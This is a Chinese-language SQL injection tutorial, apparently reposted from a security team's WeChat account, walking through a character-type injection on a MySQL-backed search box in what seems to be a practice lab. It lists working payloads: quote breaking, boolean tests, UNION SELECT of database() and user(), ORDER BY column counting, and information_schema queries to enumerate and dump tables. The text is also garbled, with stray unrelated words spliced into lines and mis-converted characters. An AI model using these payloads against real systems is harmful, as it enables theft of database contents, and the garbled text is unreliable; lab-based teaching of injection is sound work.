01mysql
字符型注入_肯定注入点nginx
正常搜索框搜索数据,输入名字就能够查询对应数据sql
查看PHP核心代码数据库
解释:
安全
1.红色箭头表示服务器经过GET请求把用户的kobe参数传到$name
服务器
2.黄色方框表示传入数据库的查询语句
微信
加入恶意字符后,传入数据库的查询语句以下:编辑器
select id,email from member where username='kobe''
注入点测试,将payload1代入查询测试
kobe' and 1=1 #
select id,email from member where username='kobe' and 1=1 #'
kobe' and 1=2 #
02spa
字符型注入_获取基本信息
在这里基本肯定注入点,查看当前数据库和用户
kobe' union select database(),user()#
传入数据库的查询命令以下
select id,email from member where username='kobe' union select database(),user()#'
👇经常使用查询语句👇
肯定当前字段
kobe' order by 3#
查询指定库全部数据表
kobe' union select table_name,2,3 from information_schema.tables where (table_schema='数据库名')#
查询指定表的全部表头
kebo' union select column_name,2,3 from information_schema.columns where (table_name="表名")#
查看指定表头内容
kebo' union select 表头1,2,表头2 from 表名#
注释:注入方法与数字型注入基本相同,只要在闭合与注释符二者区间内执行mysql命令便可利用该漏洞,从这部分开始,后续不作详细介绍与演示。
本文分享自微信公众号 - Khan安全团队(KhanCJSH)。
若有侵权,请联系 support@oschina.cn 删除。
本文参与“OSC源创计划”,欢迎正在阅读的你也加入,一块儿分享。